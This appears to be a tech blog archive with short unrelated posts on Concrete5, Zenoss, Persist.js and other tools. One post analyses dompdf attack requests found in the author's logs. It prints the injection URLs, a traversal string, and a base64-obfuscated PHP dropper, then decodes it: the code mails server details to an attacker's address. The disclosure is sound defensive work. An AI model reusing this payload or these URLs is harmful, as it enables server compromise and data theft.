Two Drifters

We have seen this error with Concrete 5.5.1

You try to setup Concrete 5, and get strange SQL errors during the installation:

If installing with an empty site, like this

you get:

mysql error: [1048: Column 'uID' cannot be null] in EXECUTE("INSERT INTO Config (cfKey,cfValue,uID) VALUES ('NEWSFLOW_LAST_VIEWED','FIRSTRUN',NULL)")

If installing with Sample content with Blog:

The error you get is:

Catchable fatal error: Argument 1 passed to ContentImporter::importPageAreas() must be an instance of Page, boolean given, called in /concrete/libraries/content/importer.php on line 75 and defined in /concrete/libraries/content/importer.php on line 197.

Solution:

You don't run Varnish by any chance, do you? We do, and we had it set up to … dispose of some cookies. The solution is, in Varnish' case, to enable pass-through for the host you are installing on.

You want to enable cookies.

Explanation:

The code which breaks is located in concrete5.5.1\concrete\models\package\starting_point.php

Config::save('SITE', SITE);
Config::save('SITE_APP_VERSION', APP_VERSION);
$u = new User();
$u->saveConfig('NEWSFLOW_LAST_VIEWED', 'FIRSTRUN');

As you see, this is the first time a User is created and used.

The User class is defined in concrete5.5.1\concrete\models\user.php

if (isset($_SESSION['uID'])) {
$this->uID = $_SESSION['uID'];
$this->uName = $_SESSION['uName'];
$this->uTimezone = $_SESSION['uTimezone'];
if (isset($_SESSION['uDefaultLanguage'])) {
$this->uDefaultLanguage = $_SESSION['uDefaultLanguage'];
}
$this->superUser = ($_SESSION['uID'] == USER_SUPER_ID) ? true : false;
} else {
$this->uID = null;
$this->uName = null;
$this->superUser = false;
$this->uDefaultLanguage = null;
$this->uTimezone = null;
}
$this->uGroups = $this->_getUserGroups();
if (!isset($args[2])) {
$_SESSION['uGroups'] = $this->uGroups;
}
}

The constructor checks in the Session for a valid user ID. If no user ID is found, it is set to zero. This happens if you throw away the cookies! Because the session is stored in them.

HTH. Feel free to comment on similar errors and solutions.

An easy to use Freeware Timer:

http://www.sonoragraphics.com/timer.html#downloads

Running Windows 7? For a working Finestra (with correct Z-Order) use Version 1.1.

Version 1.2 messes up the Z-Order, and Version 2.0 and Version 2.1 both crash when hitting Win + Z to display the window overview (known bug). Sometimes the newest version is not the best one :-)

About Finestra

Finestra is a Virtual Desktop Manager for Windows. Freeware, fast switching, graphical indication to which desktop it switches.

Ability to drag windows to other desktops (using Win + Z to show the preview). Also useful for recovering windows which have been moved to outside your monitor by accident (believe me, it happens. Especially when using different monitor setups on notebooks)

How to get started in business?

Get obsessed about an idea, talk with everybody about it … then register a domain name and start setting up! WordPress is a great solution, easily installed, and there you are – you're a business with it's own website!

What about the next steps?

Obviously, you don't want to stop talking about your new idea! Post it to FaceBook, set up camp in Twitter, start referring to it until people actually start to get annoyed :-)

To organize your ideas you might want to use XMind! (Yeah, there's a superb free version, available, too!)

Don't forget to read all you can about business, and oh – do backup your files regularly!

If your page actually starts getting massive hits, we recommend working together with us (!) and MaxCDN for all your content delivery needs.

The most important thing

Is just to get going, to love the idea and business creativity. To do it for a purpose, to change the world! Get excited, and people will follow you. Read Napoleon Hill's book – Think and get rich – to understand what I mean.

Want help?

Head on over to CatFind.it and get your answers. (See what I mean?)

University of Iowa Healthcare

• Clean looking
• informative
• entertaining / attention-grasping

What is Zenoss Core?

Zenoss Core is a fabulous, Open Source, network and device monitor. It allows you to collect statistics, track uptime and get alerts for a wide array of devices and applications, i.e. printers, routers, Linux and Windows servers, Varnish cache and many more.

It is important to see the performance of your digital assets, to ensure optimum experience for the users, and be able to react before someone notices the problems on the outside of your organisation.

Mission-critical components, i.e. corporate e-mail servers can be monitored with this solution.

Setting up Zenoss Core on an Ubuntu-VPS under OpenVZ

OpenVZ can be installed in a OpenVZ container. I chose to use the contributed Ubuntu 10.04 minimal template downloaded from OpenVZ.org. It will be a dedicated VE, just for Zenoss Core.

"ubuntu-10.04-minimal_10.04_amd64.tar.gz"

• 10.04 is LTS (long term supported)
• the minimal comes without Apache or other services

The installation of the Zenoss stack will fail if your resource limits (particularly memory) are set too low. Here's an excerpt from the configuration file of my VPS:

ONBOOT="yes"

# UBC parameters (in form of barrier:limit)
KMEMSIZE="14372700:14790164"
LOCKEDPAGES="256:256"
PRIVVMPAGES="1175000:1250000"
SHMPAGES="21504:21504"
NUMPROC="240:240"
PHYSPAGES="0:9223372036854775807"
VMGUARPAGES="33792:9223372036854775807"
OOMGUARPAGES="26112:9223372036854775807"
NUMTCPSOCK="360:360"
NUMFLOCK="188:206"
NUMPTY="16:16"
NUMSIGINFO="256:256"
TCPSNDBUF="1720320:2703360"
TCPRCVBUF="2703360:3003360"
OTHERSOCKBUF="1126080:2097152"
DGRAMRCVBUF="262144:262144"
NUMOTHERSOCK="360:360"
DCACHESIZE="3409920:3624960"
NUMFILE="9312:9312"
AVNUMPROC="180:180"
NUMIPTENT="128:128"

# Disk quota parameters (in form of softlimit:hardlimit)
DISKSPACE="5242880:5242880"
DISKINODES="200000:220000"
QUOTATIME="0"

# CPU fair sheduler parameter
CPUUNITS="1000"

You need to install wget and binutils.

apt-get install wget binutils

Then download the newest Zenoss Stack DEB package from Zenoss. The stack includes webserver, a dedicated MySQL instance and other things for running Zenoss. Choose from the native stacks (DEBIAN/UBUNTU), DEB based. In /tmp :

wget http://dev.zenoss.org/deb/dists/main/stable/binary-amd64/zenoss-stack_3.2.1_x64.deb

I used the x64 stack, as we have a 64bit server.

Install the stack using dpkg:

dpkg -i zenoss-stack_3.2.1_x64.deb

This will take quite some time! On finish, start Zenoss Core with

/etc/init.d/zenoss-stack start

Now you are finished with the console part. Fire up your browser, and go to the installation server's IP, port 8080. I.e. http://www.example.com:8080.

Here you will be asked to setup the admin password and a new user for "everyday usage". After creating them, you will be given the opportunity to automatically discover devices and servers, to manually set them up, or to skip to the dashboard. (You can, of course, always add devices and servers later on).

After getting to the dashboard, you can set up a Google Maps API Key. That is pretty self-explanatory, Zenoss Core will help you do it.

Good luck!

Further reading / watching:

Zenoss installation & monitoring a Linux server with SNMP

More information about this screencast on Castix – also includes the example snmpd.conf mentioned in the screencast.

Zenoss Core Getting Started – Adding Devices

Links

• Zenoss Blip.TV Channel (with how-to videos and discussions)

If you browse a web page from your harddrive (that is, not hosted on a local apache, calling localhost, but using file://) you might notice, that your $.getJSON requests won't work -> your application will break.

This is by design, and a security measure.

If you only load static information via JSON – which you probably would in such an environment, right?, one (crutch of a) solution would be to include the information as a new .JS file (include it in your HTML head) which sets up a variable containing this information. This variable will replace your .getJSON call by a simple assignment.

Yes, it seems to be by design (of Firefox' implementation of localstorage). It does not work for file:// URLs.

Persist.js currently has no workaround, the contents of your database will be cleared …

In order for Firefox to work offline, you have to remove the "localstorage" type manually, like this:

Persist.remove('localstorage');

Persist.js will issue a warning that globalStorage can't be used, and fall back to cookie storage, which has size limitations. On a side note, removing both localstorage and cookie storage will fall back to Flash. Flash will probably work, but it pops up a message which your users might find bewildering, and click away – viz:

What is left after removing localstorage, cookie and flash?

Nothing (as Gears is not available).

Cookie's the way to go – you will have to live with the size restraints!

The way to check for larger strings than the storage allows does not seem to work for me. I used:

Persist.size != -1 && Persist.size < JSON.stringify(tmp_answer_db).length

One work around for larger data might be to use a JS compressor to fit all into the cookie. Or save less – reduce to the essential! Don't use JSON, use your own notation. Even JSON is too large for the cookie.

Update: Detecting firefox in a local file:// environment and removing localstorage

//detect FireFox. If it's the Fox, AND running locally remove localstorage
if (/Firefox[\/\s](\d+\.\d+)/.test(navigator.userAgent) && window.location.protocol == 'file:'){
Persist.remove('localstorage');
}

After installing Varnish I can see pages which are frequently accessed.

//dompdf.php?input_file=http://www.fridela.com/slide/vero.txt?

And

/max/2009/06/bambooinvoice-und-pdf-briefpapier/dompdf.php?input_file=../../../../../../../../../../../../../../../../proc/self/environ%00

were lines which I found quite strange. Was someone abusing my server to convert their stuff to PDF?

I tried to go to fridela.com – it seems like a normal website, dedicated to selling food to housewives.

vero.txt is reported as dangerous by Microsoft Security Essentials.

I DO know that it's a text file, probably it's danger lies if used with the correct application. Here's the contents of vero.txt

<?
$win = strtolower(substr(PHP_OS,0,3)) == "win";
echo "PLaTo<br>";
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = true;
$hsafemode = "4ON6";
}
else {$safemode = false; $hsafemode = "3OFF6";}
$xos = wordwrap(php_uname(),90,"<br>",1);
$xpwd = @getcwd();
$OS = "<<".$hsafemode.">> ".$xos."";
echo "<center><A class=ria href=\"";echo'" DESIGNTIMESP=16110>http://".$OS."\">";echo "PLaTo</A></center><br>";
echo "<br>OSTYPE:$OS<br>";
echo "<br>Pwd:$xpwd<br>";
eval(base64_decode("aWYgKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSBvciBzdHJ0b2xvd2VyKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSkgPT0gIm9uIikgeyAkc2FmZW1vZGUgPSAiT04iOyB9IGVsc2UgeyAkc2FmZW1vZGUgPSAiT0ZGIjsgfSAkdmlzaXRvciA9ICRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyAkZmxvYXQgPSAiRnJvbSA6IHZ1cmwgaW5mbyA8ZnVsbEBpbmZvLmNvbT4iOyAkYXJhbiA9IGV4ZWMoJ3VuYW1lIC1hOycpOyAkd2ViID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOyAkaW5qID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07ICRib2R5ID0gIkJ1ZyBodHRwOi8vIi4kd2ViLiRpbmouIm5uU3ByZWFkIFZpYSA6ICIuJHZpc2l0b3IuIm5uS2VybmVsIFZlcnNpb24gOiAiLiRhcmFuLiJublNhZmUgTW9kZSA6ICIuJHNhZmVtb2RlOyBtYWlsKCJ1bml4b24yMDEwQGdtYWlsLmNvbSIsIlNldG9yYW4gQm9zICIuJHNhZmVtb2RlLCRib2R5LCRmbG9hdCk7"));
die("<center> ByroeNet </center>");
?>

The base64 part decodes to

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safem
ode = "ON"; } else { $safemode = "OFF"; } $visitor = $_SERVER["REMOTE_ADDR"]; $f
loat = "From : vurl info <full@info.com>"; $aran = exec('uname -a;'); $web = $_S
ERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $body = "Bug http://".$web.$
inj."nnSpread Via : ".$visitor."nnKernel Version : ".$aran."nnSafe Mode : ".$saf
emode; mail("unixon2010@gmail.com","Setoran Bos ".$safemode,$body,$float);

Actually the exploit has to be executed by DomPDF for it to work, i.e. meaning it should execute PHP code. After the exploit has been installed, a mail is sent to unixon2010@gmail.com

additional code seems to be hosted at http://www.fridela.com/slide/air.txt – it's apparently a control interface to the cracked server (maybe also injected via DomPDF).

Be careful around these. Turn off inclusion of remote URLs in your PHP.ini.

At some point in creating a new account Interactive Brokers "Next" button won't work (on the page you declare your investment targets and net worth).

The solution is to use FireFox without Privoxy to continue with the application form.

I am not sure whether it is Privoxy or Opera blocking the application (although I suspect Privoxy blocking some JavaScripts.)